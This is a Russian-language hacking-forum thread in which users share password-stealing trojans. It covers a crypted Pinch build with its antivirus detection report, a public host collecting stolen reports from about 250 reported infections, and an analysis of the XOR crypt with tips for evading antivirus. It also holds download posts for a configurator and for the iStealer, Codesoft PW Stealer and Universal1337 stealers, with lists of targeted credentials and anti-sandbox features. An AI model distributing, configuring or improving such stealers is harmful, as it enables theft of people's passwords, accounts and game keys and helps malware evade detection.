• XSS.stack #1 – первый литературный журнал от юзеров форума

Pinch

как не странно и не всем еще палится))))


File Information
Report Generated: 24.3.2009 at 21.37.30 (GMT 1)
Time for scan: 44 seconds
File Name: Pinch.exe
File Size: 43 KB
MD5 Hash: 14B2390140E21BE442B085DFAD54EC10
SHA1 Hash: 1006CE04FC34664351EA96BFA3DB58047C36F3EB
Detection Rate: 11 on 24 (45,83 %)
Status: INFECTED

a-squared - Trojan-PWS.Win32.LdPinch!IK
Avira AntiVir - TR/Crypt.XDR.Gen
Avast - Win32:trojan-gen {Other}
AVG - Win32/PolyCrypt
BitDefender - Trojan.PWS.Ldpinch.TER
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Trojan.PWS.LDPinch.1941
Ewido - Nothing found!
F-PROT 6 - W32/Zbot.I.gen!Eldorado
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Trojan-PSW.Win32.LdPinch.aepp
McAfee - PWS-LDPinch trojan
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Suspicious
Solo Antivirus - Nothing found!
Sophos - Sus/UnkPacker
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Extra Information
CRC32: 3950779123
Packer detected: Nothing found [Overlay] *
Application Type: Executable (EXE) 32bit
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View

Scan report generated by NoVirusThanks.org



Orion стукни в аску - сделаем :P
 
Код:
 Ar3s (22:36:46 25/03/2005)
блин. Поробовал твоего пинча. Не работает у меня. Прогрузил 100, отчетов ноль. Гейт рабочий. ПРоверил.

хз все работает

вот сделал для всех так сказать

сам билд:
slil.ru
depositfiles.com
b3jiom-by-damagelab.freehostia.com

хост с отчетами:
b3jiom-by-damagelab.freehostia.com/gate/reps/

прогружаем и сливаем отчеты)
по просьбе буду очищать, хотя думаю это нафик ни кому не надО)))


з.ы. и сразу прогрузил чуток =)) а точнее +250
и так сказать я вроде наблюдал только 1 отчет 0кб, т.е. битый
ну может еще будет пару битых, не смотрел отчеты!
отсавляю так сказать на растерзание)))

фтп не даю специально)) клацайте вручную))

прогруз делал у 43I-489-I27 (постоянно пользуюсь его услугами, дешево и сердито)


з.ы.ы. всем споки ноки)
ПОРА СПАТЬ!!!
 
:) мм..
все конечно хорошо, но это обычный пинч ничего нового я в нем не увидел.
только то что он криптован но это можно сделать и самому.
Немного о криптовке... про анти эвристик ничего писать не буду.
криптовка так себе :nono: , используется обычных хор алгоритм, так как по рукой был только 1 билд о рандрмности (полиморфности) ничего сказать не могу.
ключ крипта F992 одно отличие что тут используеться не byte а word т.е криптуеться по 2 байта.
после раскриптовки мы получаем уже распакованый пинч( что прекрасно детектят антивирусы) которые проходят антиотладку или у который есть функция детектить ключ по 00 00 т.е. в разрывах между секциями должны быть 00 00 00 00 и.т.д. в данном случии там будет F9 92 F9 92 и.т.д.
для улучшения крипта нужно внести не только хор а к примеру добавить add ,таким образом антивирусу придется проходить антиотладку если сможет.
это намного усложнит работу антивирусам.
о криптовке все.
далее идет построение секций и запуск через память.
+ в том что данный пинч использует свой импорт радует, так как старый пинч палят по импорту, такие антивири как... (забыл какие)

pinch
это ссылка на раскриптованный пинч, если сверить с пинчем от слеша (а он на базе 2,99) то разници нет.

стоит ли платить решать вам. :rtfm: (если это платный софт)

р.с. не отказался бы от конфигуратора. если это возможно... :baby:
 
р.с. не отказался бы от конфигуратора. если это возможно...

возможно

http://rapidshare.com/files/213637043/br.rar.html
пароль:
b3jiom
:P
 
подскажите пожалста, в чем может быть проблема... зарегился на freehostia.com, закинул гейт, поставил права (на папки 777, на гейт 775), в билдере все вроде ввел правильно:
www.имя.freehostia.com
/gate/gate.php (именно там гейт и лежит)
мыло не указывал (написал куйню какую-то)

почему-то отчеты не приходят(((( пришел тока один раз, и то весом в 0кб.
подскажите плиз в чем может быть проблема
 
почему-то отчеты не приходят(((( пришел тока один раз, и то весом в 0кб.

Если хоть какой то отчет пришел, то значит гейт работает
proof me if i wrong

пачку хостингов
бесплатных?
 
Это на самом деле не отчет от пинча. Это когда он файлы закинул и зашел на гейт тот автоматом сформировал отчет, но нулевой размер оттого, что данных передано небыло. т.е. сам пинч до гейта не доходит. У меня было тоже самое. ХЗ почему. Повторно не тестил. Сегодня завел себе пачку хостингов, может буду пробовать...
 
iStealer 4.0.4
Author: Kizar - Kizar Labs 2009
First Build: 15-03-2009

Disclaimer:
This program was made for educational purposes.
The author does not take any responsibility for what you do with this program.

Thanks to:
- All www.hackhound.org members.
- securityxploded.com for firepassword.
- www.nirsoft.net for ideas.
- Nutter for Anti Wire-Shark.
- www.un4seen.com for audio libray.
c4c393cb475a.png

Запускать через Loader.exe
:zns5: Скачать|Download
 
Codesoft PW Stealer v0.5

**ев комбайн =\
561y.png

Steal Settings:
PW Messanger Packet Status
MSN Messenger
Windows Messenger
Yahoo Messenger (Version 5.x und 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
ICQ 6
AOL Instand Messenger/Netscape 7
Trilian
Miranda
GAIM
PW Mail Packet
Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape 6.x/7.x
Group Mail Free, Gmail
Yahoo Mail
MSN Messenger
Hotmail / MSN Mail
Eudora
Protected Storage PW Packet
Outlook Passwords
Auto Completet password in IE
Password protected sites in IE
MSN Explorer Passwords
Firefox PW Packet Firefox Version 1.x passwords
Firefox Version 2.x passwords
Network PW Packet
Dial-Up passwords (Internet and VPN)
Loginp passwords of remote computers
Passwords from Exchangemailboxen
IE7: Password-protected Web sites
FTP PW Packet
CoreFTP passworts
Quick ‘n Easy FTP passworts
FlashFXP 3.x passwords
Filezilla Client 3.x password
Broker FTP client
FTP Control password
Ipswitch Ws FTP client passworts
Steam PW Packet
Steam Username
Steam Password
Steam game-path
Game Key Stealer
Battlefield 1942:
Battlefield 1942 Secret Weapons Of WWII:
Battlefield 1942 The Road To Rome:
Battlefield Vietnam:
Black and White:
Call of Duty:
Call of Duty 2:
Call of Duty 4:
Chrome:
Command and Conquer Generals:
Command and Conquer Generals: Zero Hour:
Command and Conquer Red Alert 2:
Command and Conquer Red Alert:
Command and Conquer Tiberian Sun: Command and Conquer Tiberian Sun
Counter-Strike:
FarCry:
FIFA 2002:
FIFA 2003:
FIFA 2004:
Freedom Force:
Global Operations:
Gunman Chronicles:
Half-Life:
Hidden and Dangerous 2:
IGI2: Covert Strike:
Industry Giant 2:
James Bond 007 Nightfire:
Legends of Might and Magic:
Microsoft Windows 2000/XP Key’s
Microsoft Office 2000 / XP / 2003 / 2007 Produkte Key’s
Medal of Honor Allied Assault:
Medal of Honor Allied Assault: Breakthrough:
Medal of Honor Allied Assault: Spearhead:
Nascar Racing 2002:
Nascar Racing 2003:
NBA LIVE 2003:
NBA LIVE 2004:
Need For Speed Hot Pursuit 2:
Need For Speed Underground:
NHL 2002:
NHL 2003:
NHL 2004:
NOX
Rainbow Six III RavenShield:
Shogun Total War Warlord Edition:
Soldiers Of Anarchy:
The Gladiators:
The Sims Deluxe:
The Sims Hot Date:
The Sims House Party:
The Sims Livin’ Large:
The Sims Superstar:
The Sims Unleashed:
The Sims Vacation:
The Sims:
Unreal Tournament 2003:
Unreal Tournament 2004:
Neverwinter Nights (Shadows of Undrentide):
The Gladiators:
Freedom Force:

Security Settings:
Attribut Changer
Hidde files
Read only files
System files
Archived files
Encrypted files
[ + ] Sandbox Detection
[ + ] Kapersky Detection
[ + ] Kapersky Killer
[ + ] Virtual PC & Vmware Detection
[ + ] Anti Anubis
[ + ] Melt Stub
[ + ] Crypt FTP/Mail Settings
[ + ] Crypt PW File


Main Settings:
[ + ] FTP Upload ink Check Funktion
[ + ] Mail Versand ink Check Funktion

PW Viewer:
[ + ] Decrypt Singel PW File
[ + ] Decrypt Multi PW Files
[ + ] Decrypt Steam Passworts
[ + ] Save PW File


Icon Changer:
[ + ] Supports *.ico & *.exe
[ + ] 18 auswählbare Icons


Custom Zeugs:
[ + ] Builder
[ + ] Save & Load Settings vom Builder
[ + ] About

Не смотря на дату вышел в паблик довольно недавно.

:zns5: Скачать|Download
 
Universal1337 V2 unpacked
Dibujo.jpg

sett.jpg


//Index//
Steam
Produkt Keys
Network Passes
Paypal
Ebay
AIM
ICQ
Miranda
Trillian
MSN Messenger
AOL Instant Messenger
Windows Messenger (In Windows XP und Vista)
Windows Live Messenger (In Windows XP und Vista)
Yahoo Messenger
Google Talk
GAIM (Pidgin)
Windows Mail
Outlook Express
Microsoft Outlook
IncrediMail
Eudora
Netscape
Mozilla Firefox
Internet Explorer
Group Mail Free
PC Infos


:zns5: Скачать|Download
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх